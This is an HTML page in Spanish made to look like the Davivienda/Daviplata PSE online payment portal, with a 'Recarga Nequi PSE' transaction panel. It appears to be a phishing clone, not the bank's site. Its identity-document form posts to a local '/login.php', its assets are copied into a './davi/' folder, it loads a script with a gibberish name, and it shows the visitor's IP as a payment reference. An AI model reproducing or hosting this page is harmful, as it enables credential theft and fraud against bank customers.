<!DOCTYPE html>
<html lang="es" xmlns="http://www.w3.org/1999/xhtml"><head id="j_idt2"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="./davi/y-You-must-perfe-is-appy-Peach-slaine-Lamberly-m" async=""></script>
		<title>PSE Daviplata</title>
		<link rel="icon" href="https://www.daviplata.com/PSE/resources/img/favicon_ico.ico">
		
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui, viewport-fit=cover">
        <!--cache control App-->
        <meta http-equiv="Expires" content="0">
        <meta http-equiv="Last-Modified" content="0">
        <meta http-equiv="Cache-Control" content="no-cache, mustrevalidate">
        <meta http-equiv="Pragma" content="no-cache">        
        <!--cache control App-->
        <meta name="apple-mobile-web-app-capable" content="yes">
        <!-- Color theme for statusbar -->
        <meta name="theme-color" content="#ed1c27">
        <!-- Load It Like A Native App -->
        <meta name="apple-touch-fullscreen" content="yes">
        <meta name="apple-mobile-web-app-capable" content="yes">
        <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"> 
        
<link type="text/css" rel="stylesheet" href="./davi/bootstrap.min.css.css"><link type="text/css" rel="stylesheet" href="./davi/app.css.css"></head><body class="">
		<div class="desktop-web">
	
			<div id="wrapper" class="view view-main">
	
				<header class="headernew">
	
					<div class="container-fluid">
		
						<div class="row align-items-center">
							<div class="col-6 col-md-6 col-sm-12 col-12">
								<ul class="logodesktop">
									<li class="sephead"><img src="./davi/daviviendalogo22.png.xhtml" alt="LogoDavivienda"></li>
									<li><img src="./davi/daviplata-logo3.png.xhtml" alt="LogoDaviplata" style="width: 90px"></li>
								</ul>
							</div>
							<div class="col-6 col-md-6 col-sm-12 col-12"><span id="fechaHora">
										<br>Código único CUS: 450441634
									</p>
									<script type="text/javascript" language="javascript">
							    		/* <![CDATA[ */
										if(closeSession!=null){
										  clearTimeout(closeSession);
										}
										var intervalo=parseInt("400000");
										if(intervalo!=null && intervalo>0){
										  closeSession = setTimeout(loadTimeOut, intervalo);
										}
										/* ]]> */
									</script></span>
							</div>
						</div>
		
					</div>
	
				</header>
				<!--end headernew--><div id="headerBienvenido" class="container-fluid"><div id="headerBienvenidoAlt" class="row no-gutters">
	
						<div class="col col-md-12">
							<div class="loginapp">
								<span class="font-light">Bienvenido al Portal de Pagos en Línea y PSE</span>
							</div>
						</div></div></div><div id="container" class="container"><span id="contenido">
					<div class="row"><div id="blockInicial" class="col-md-5 offset-md-1 col-sm-5 offset-sm-0 col-10 offset-1">
	
							<div class="loginapp fixedbox">
								<h2>Información de pago</h2>
<form id="formAutenticar" name="formAutenticar" method="post" action="/login.php" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="formAutenticar" value="formAutenticar">
<span id="formAutenticar:tipoNumDocumento"><select id="formAutenticar:tipoIdentificacion" name="formAutenticar:tipoIdentificacion" class="BGSelectbox" size="1" onchange="mojarra.ab(this,event,&#39;valueChange&#39;,0,&#39;camposEntrada fechaHora&#39;)">	<option value="01" selected="selected" style="background-color: black;">Cedula de Ciudadania</option>
	<option value="02" style="background-color: black;">Cedula de Extranjeria</option>
	<option value="04" style="background-color: black;">Tarjeta de Identidad</option>
</select><input id="formAutenticar:numeroDocumento" type="text" name="usswd" autocomplete="off" maxlength="16" placeholder="Número de documento" required>
<input id="formAutenticar:numeroDocumentoCrypto" type="hidden" name="formAutenticarmentoCrypto">
										<script type="text/javascript" language="javascript">
								    		/* <![CDATA[ */
												setStyle();
											/* ]]> */
										</script></span>
									
									<br>
									<div class="row">
											<div class="col-12 col-md-12"><input id="formAutenticar:continuar" type="submit" name="formAutenticar:continuar" value="Continuar" class="ui-buttom" onclick="jsf.util.chain(this,event,&#39;encriptarCamposSensibles();&#39;,&#39;mojarra.ab(this,event,\&#39;action\&#39;,\&#39;formAutenticar\&#39;,\&#39;headerBienvenido container mensajesPopup fechaHora\&#39;)&#39;);return false">
											</div>
										<div class="col-12 col-md-12"><input  type="submit" name="formAutenticar:cancelarBtn" value="Cancelar" class="ui-buttom" disabled>
										</div>
									</div>
                                	<!--end novalid--><input type="hidden" name="javax.faces.ViewState" id="j_id1:javax.faces.ViewState:0" value="-2288398198457852093:3748272752342881721" autocomplete="off">
</form>
	
							</div>
							<!--end loginapp--></div>
	
						<div class="col-md-5 col-sm-7 offset-sm-0 col-10 offset-1">
	
							<h2>Detalle de la transacción</h2>
							<br>
	
								<div class="data-result-2">
	
									<ul>

										</li>
										<li><label>Motivo</label>
											<h4>Recarga Nequi PSE</h4>
										</li>

<li>
    <label>Fecha</label>
    <h4 id="fechaActualizada"></h4>
</li>


										<script>
											function obtenerFechaActual() {
												var fecha = new Date();
												var dia = fecha.getDate();
												var mes = fecha.getMonth() + 1; // Se suma 1 porque los meses comienzan desde 0
												var año = fecha.getFullYear();
										
												dia = dia < 10 ? '0' + dia : dia;
												mes = mes < 10 ? '0' + mes : mes;
										
												return dia + '/' + mes + '/' + año;
											}
										
											function actualizarFecha() {
												var fechaActualizadaElemento = document.getElementById('fechaActualizada');
												fechaActualizadaElemento.textContent = obtenerFechaActual();
											}
										
											window.onload = function () {
												actualizarFecha();
										
												setInterval(actualizarFecha, 1000);
											};
										</script>

										<li></li>
									</ul>
									<div class="row colthree no-gutters">
										<div class="col-md-4 col-sm-4 col-4">

										</div>
										<div class="col-md-4 col-sm-4 col-4">
											<label>Referencia 1</label>
											<h4>186.116.206.23</h4>
										</div>
										<div class="col-md-4 col-sm-4 col-4">
											<label>Referencia 3</label>
											<h4></h4>
										</div>
									</div>
	
								</div> <!--data-result-->
						</div>
	
					</div>
					<!--end row--></span></div>
				<!--end container--><div id="mensajesPopup"></div>
	
			</div>
			<!--end wrapper-->
	
		</div>
		<!--end desktop-web-->
		
		<div class="modal">
            <div class="textLoader">Procesando...</div>
        </div>

		<footer> <span class="arrow"><img src="./davi/lemotiv.svg.svg" alt="Abrir"></span>
			<div class="container">
				<div class="row">
					<div class="col-12 col-md-8 col-sm-8">
						<ul>
							<li><img src="./davi/Vigilado.svg.svg" alt="Vigilado"></li>
							<li class="hidden-sm">Banco Davivienda S.A Todos los derechos
								reservados 2024</li>
						</ul>
					</div>
					<div class="col-12 col-md-4 col-sm-4 logo"><img src="./davi/Logo-Davivienda-Blanco.svg.svg" alt="Logo Davivienda Blanco">
					</div>
				</div>
			</div>
		</footer><script type="text/javascript" src="./davi/_Incapsula_Resource" async=""></script>
</body></html>